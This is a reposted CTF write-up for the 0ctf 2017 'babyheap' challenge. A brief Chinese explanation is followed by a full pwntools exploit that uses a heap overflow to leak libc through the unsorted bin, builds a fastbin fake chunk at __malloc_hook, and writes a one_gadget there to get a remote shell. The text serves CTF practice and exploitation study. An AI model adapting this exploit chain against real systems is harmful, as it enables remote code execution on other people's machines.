0ctf_2017_babyheap

Posted Nullan

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了0ctf_2017_babyheap相关的知识,希望对你有一定的参考价值。

思路

查看了一下ida后,发现有堆溢出漏洞
那可以利用unsorted bin 泄露main arena的地址,然后在malloc_hook处构造fake_chunk ,利用one_gadget在malloc_hook写入函数值,可以getshell
ps:注意本地libc的问题

exp及具体分析

from pwn import*

context.log_level = 'debug'
#p = process('./babyheap')

p = remote('node4.buuoj.cn','28992')
lib = ELF('./libc-2.23.so')
def alloc(size):
    p.sendlineafter(': ','1')
    p.sendlineafter(': ',str(size))

def edit(idx,size,content):
    p.sendlineafter(': ','2')
    p.sendlineafter(': ',str(idx))
    p.sendlineafter(": ",str(size))
    p.sendlineafter(": ",content)

def delete(idx):
    p.sendlineafter(': ','3')
    p.sendlineafter(': ',str(idx))

def show(idx):
    p.sendlineafter(': ','4')
    p.sendlineafter(': ',str(idx))

alloc(0x10)#0
alloc(0x20)#1
alloc(0x80)#2
alloc(0x10)#3
alloc(0x68)#4
alloc(0x50)#avoid topchunk

payload = p64(0)*3+p64(0xc1)
edit(0,len(payload),payload)#heap overflow 
delete(1)
alloc(0xb0)#unsortedbin overlap
payload = p64(0)*5 + p64(0x91)
edit(1,len(payload),payload)
delete(2)
show(1)#show(1) can dump the content of chunk(2)

libc_base = u64(p.recvuntil('\\x7f')[-6:].ljust(8,'\\x00')) -0x3c4b78##0x3c4b78 is a abiding address of ubuntu16
malloc_hook = libc_base + lib.symbols['__malloc_hook']

delete(4)

payload = p64(0)*3 + p64(0x71)+ p64(malloc_hook-0x23) 
edit(3,len(payload),payload)

alloc(0x68)#unsorted bin is FIFO
alloc(0x68)#malloc_hook - 0x23


one = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libc_base + one[1]

payload = '\\x00'*0x13 + p64(one_gadget)
edit(4,len(payload),payload)#edit malloc_hook

#gdb.attach(p)
alloc(0x10)#getshell
#pause()
p.interactive()




以上是关于0ctf_2017_babyheap的主要内容,如果未能解决你的问题,请参考以下文章

FastBinAttack实战babyheap_0ctf_2017

0ctf_2017_babyheap

babyheap_0ctf_2017 详细解析BUUCTF

babyheap_0ctf_2017 堆技巧 fastbin-attack

0ctf2017-babyheap

0ctf2017-babyheap调试记录fastbin-attack